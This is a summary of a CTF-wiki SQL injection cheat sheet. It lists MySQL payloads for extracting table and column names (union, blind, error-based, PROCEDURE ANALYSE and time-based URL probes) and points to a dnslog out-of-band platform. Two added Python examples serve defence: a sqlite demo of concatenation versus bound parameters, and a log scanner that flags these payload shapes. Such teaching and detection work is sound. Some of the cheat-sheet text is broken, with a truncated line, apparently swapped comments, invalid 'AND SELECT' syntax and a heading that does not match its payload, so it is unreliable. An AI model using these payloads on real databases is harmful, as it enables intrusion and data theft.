ctf-wiki-sqli summary


Original URL: https://wiki.x10sec.org/web/sqli-zh/

Table names

  • union query

    -- use version=9 on MySQL 4, version=10 on MySQL 5
    UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;   /* list tables in the current database */
    UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database();   /* list tables in all user-defined databases */
    SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql';

  • blind injection

    AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

  • error-based

    AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
    (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);
    AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));   -- works on version 5.1.5

Column names

  • union query

    UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'

  • blind injection

    AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

  • error-based

    -- works on version 5.1.5
    AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)
    -- fixed in MySQL 5.1
    AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
    (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0);
    AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));

  • using PROCEDURE ANALYSE()

    -- this requires the web page to display one field of the query you are injecting into
    -- get the first column name
    SELECT username, permission FROM Users WHERE id = 1; 1 PROCEDURE ANALYSE()
    -- get the second column name
    1 LIMIT 1,1 PROCEDURE ANALYSE()
    -- get the third column name
    1 LIMIT 2,1 PROCEDURE ANALYSE()
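Added example, not from ctf-wiki or the original page: a small Python/sqlite3 script showing why the union queries above leak catalogue names when user input is concatenated into the SQL text, and why binding the same input as a parameter stops it. The sample database, table names and payload are constructed for this example; sqlite_master stands in for MySQL's information_schema.tables.

```python
import sqlite3


def build_db():
    """Constructed sample database (not from the page): an application table
    plus a second table whose name the attacker does not know in advance."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, permission TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'admin'), (2, 'bob', 'user')")
    conn.execute("CREATE TABLE secrets (id INTEGER, token TEXT)")
    conn.execute("INSERT INTO secrets VALUES (1, 'constructed-token')")
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: whatever the caller passes becomes SQL text,
    so a UNION appended to the value is executed as part of the query."""
    sql = "SELECT username, permission FROM users WHERE id = " + str(user_id)
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Bound parameter: the value is handed to the engine separately from the
    SQL text, so it can only ever be compared against the id column."""
    sql = "SELECT username, permission FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# Same shape as the page's 'union query' payload for table names, aimed at
# sqlite's catalogue table instead of information_schema.tables. The second
# SELECT must return as many columns as the first, hence the 'x' filler.
UNION_PAYLOAD = (
    "1 UNION SELECT group_concat(name), 'x' FROM sqlite_master WHERE type='table'"
)


def leaked_table_names(rows):
    """Collect catalogue names that came back through the vulnerable query."""
    names = set()
    for first_col, _ in rows:
        for part in str(first_col).split(","):
            if part in ("users", "secrets"):
                names.add(part)
    return names


if __name__ == "__main__":
    db = build_db()
    print("vulnerable   :", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterized:", lookup_parameterized(db, UNION_PAYLOAD))
```

Running the script shows the concatenated query returning an extra row that names every table in the database, while the parameterized version returns nothing for the same input because the whole string is compared to the integer id and never matches.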


Not allowed to use “

BENCHMARK to judge execution time

    http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))
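Added example, my own detection logic rather than anything from the original page: a Python scanner that URL-decodes web-server access-log lines and flags the technique families this page lists (union queries against information_schema, ExtractValue and FLOOR(RAND()) error-based probes, a subquery inside rand() in an ORDER BY parameter, and BENCHMARK time-based probes). The signature names, regular expressions and log lines are constructed for the example; the regexes are deliberately loose and should be tuned against real traffic before use in alerting.

```python
import re
from urllib.parse import unquote_plus

# Signature families derived from the payload shapes listed on this page.
# The regexes are my own and case-insensitive; they are not from the page.
SIGNATURES = {
    "union_query": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b", re.I),
    "error_based": re.compile(r"\bextractvalue\s*\(|\bfloor\s*\(\s*rand\s*\(", re.I),
    "subquery_in_rand": re.compile(r"\brand\s*\(\s*\(\s*select\b", re.I),
    "time_based": re.compile(r"\bbenchmark\s*\(", re.I),
}


def decode(line):
    """Decode twice: a second pass is a no-op on plain text but unwraps
    double-encoded parameters that a single decode would leave opaque."""
    return unquote_plus(unquote_plus(line))


def classify(line):
    """Return the sorted list of signature families that match one log line."""
    text = decode(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan(lines):
    """Return (line_number, families) for every line matching at least one family."""
    hits = []
    for number, line in enumerate(lines, 1):
        families = classify(line)
        if families:
            hits.append((number, families))
    return hits


# Constructed access-log lines in common log format; not real traffic.
TS = "[01/Jan/2025:00:00:00 +0000]"
SAMPLE_LOG = [
    f'10.0.0.5 - - {TS} "GET /list.php?id=1 HTTP/1.1" 200 512',
    f'10.0.0.7 - - {TS} "GET /list.php?id=1%20UNION%20SELECT%20GROUP_CONCAT(table_name)'
    f'%20FROM%20information_schema.tables HTTP/1.1" 200 9021',
    f'10.0.0.7 - - {TS} "GET /list.php?id=1%20AND%20ExtractValue(1,CONCAT(0x5c,'
    f'(SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%201))) HTTP/1.1" 500 388',
    f'10.0.0.9 - - {TS} "GET /list.php?order=rand((select%20char(substring(table_name,1,1))'
    f'%20from%20information_schema.tables%20limit%201)<=128) HTTP/1.1" 200 512',
    f'10.0.0.9 - - {TS} "GET /list.php?id=1%20AND%20BENCHMARK(1000000,1) HTTP/1.1" 200 512',
]


if __name__ == "__main__":
    for number, families in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(families)}")
```

The families are reported together rather than collapsed into one alert because the combination is what matters for triage: a schema probe on its own may be a scanner, a schema probe followed by error-based and then time-based attempts from the same source looks like an operator working around a filter, and the 500 status on the ExtractValue line is the kind of corroborating signal worth correlating with the application's error log.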
dnslog platform: http://ceye.io/